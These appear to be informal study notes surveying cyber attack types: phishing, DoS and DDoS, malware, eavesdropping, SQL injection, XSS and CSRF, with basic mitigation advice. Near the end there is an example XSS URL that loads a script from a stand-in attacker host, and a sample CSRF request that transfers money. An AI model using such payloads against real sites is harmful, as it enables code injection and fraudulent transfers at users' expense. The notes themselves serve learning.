A cyber attack is an attempt to exploit a vulnerability in a system, device or network with the intent to steal information or gain unauthorised access.
Nobody is necessarily safe from a cyber attack, though certain things like military bases are at much higher risk of them.
The severity of an attack will likely vary based on the attacker's motivations, whether they're financial, political, government-related, gang-related or
for espionage.

Classifications:
	Social engineering - Psychological exploitation of a person to make them do something to breach confidentiality.
	Web application attacks - SQL injections, cross-site scripting, cross-site request forging, eavesdropping.
	System intrusion -  Attacks using malware and/or hacking
	Misc. errors - Unintentional actions compromising security. (PC left unattended)
	Privilege misuse - Issues caused by unapproved or malicious usage of elevated privileges given legitimately.
	Lost & stolen assets - Attacks where information went missing, unintentionally or maliciously.
	Denial of service - Attacks where the availability of a network/system is compromised. Includes both network & application layer attacks.

Social engineering:	
	Phishing - General term?
	Spear-phishing - Highly targeted, the scammer researches the victim before using specific ways to target them.
			      More and more common because of how much info people share online. Someone could pretend to be your co-worker and use
			      personal information about them in an effort to trick you. Multi-stage (studying victim, studing habits, studying friends, etc)
	Vishing - "Voice phishing", over the phone scams.
	Online phishing - Fake websites ("amazoon.com") Some may be very well hidden. ("google.com.uk" over ".co.uk" maybe)
			       Preventable by paying attention, which is why they work so well.
	
Phishing is so popular because people are the weakest link in any system. It doesn't matter what crazy security you have if an idiot is in charge of it
and someone can exploit them. It's very easy and very cheap to phish. Mitigating phishing can be attempted via user security awareness training,
using MFA, not oversharing info on social media, keeping systems up-to-date and using spam filters on emails/phones. Spam filters aren't 100%
accurate but it's still better to have them than not to.

DoS and DDoS attacks (all of these are followed by the word "attack"):
	SYN Flood  - Repeated SYN (connection request [client hello]) packets, overloading the server. Basically leaves the server hanging, expecting
		           some more data. Opens many sessions, which then causes the overload.
	Smurf - Repeated ICMP (just data?) packets using the spoofed IP address of a victim. (Research this?)
	Botnets - "Zombie" devices, often IoT devices nowadays, hacked and used as part of a DDoS attack.
	Ping of Death - Malicious data until the system crashes.

DoS is one IP? DDoS is many. Could be millions.
DoS are often mitigated by rate-limting IP addresses. If an IP sends too much data, it assumes a DoS attack and blocks it.
DDoS is very hard to mitigate because you'd probably be blocking actual users of the service who became part of the DDoS.


A virus is a computer program that affects or INfects a computer negatively, changing the way it works without the user's knowledge or permission.
Viruses may then spread, hence the name.
	Worm - Spreads repeatedly across memory or a network, using many resources.
	Trojan horse - Poses as a legitimate program but has a malicious payload. Doesn't replicate to other computers.
	Spyware -  Secretly gathers information, like a keylogger for example. By design, you wouldn't know it was there.
	Ransomware - Encrypts data until a fee has been paid. Even then you have to trust that they'll even send you the decryptor.
			  May threaten to delete or release the data; whichever they think would do more damage to you/the company.


Eavesdropping can be passive or active.
	Passive - Attacker is just listening to communications and not modifying them.
	Active - Attacker is listening and then messing with the communications. Modifying, deleting, sending their own messages, etc.

SQL injections are where users could enter SQL code into site inputs (forms) which would then be executed. This is a result of poor programming,
where SQL statements are not prepared/properly escaped before being used. A user could enter an SQL escape character and then follow that with an SQL command. The site would then recognise it as valid SQL.

Cross-site scripting (XSS) is where a user can distort a URL to perform unintended actions. For example, this site uses GET requests for "message":
https://my-site.com/messages?msg="Hello!"
But a malicious user could possibly use that to inject malicious code, such as:
https://my-site.com/messages?msg=<script src=https://evil-user.com/virus.js></script>

CSRF uses maliciously formed links that will perform actions when clicked. For example, they make a request link that would transfer $1000 to them.
They send this to a user who is logged in. The user clicks this, and then because that is actually valid, the transfer would occur. 
GET http://bank.com/transfer?acct=Hacker&amount=1000 HTTP/1.1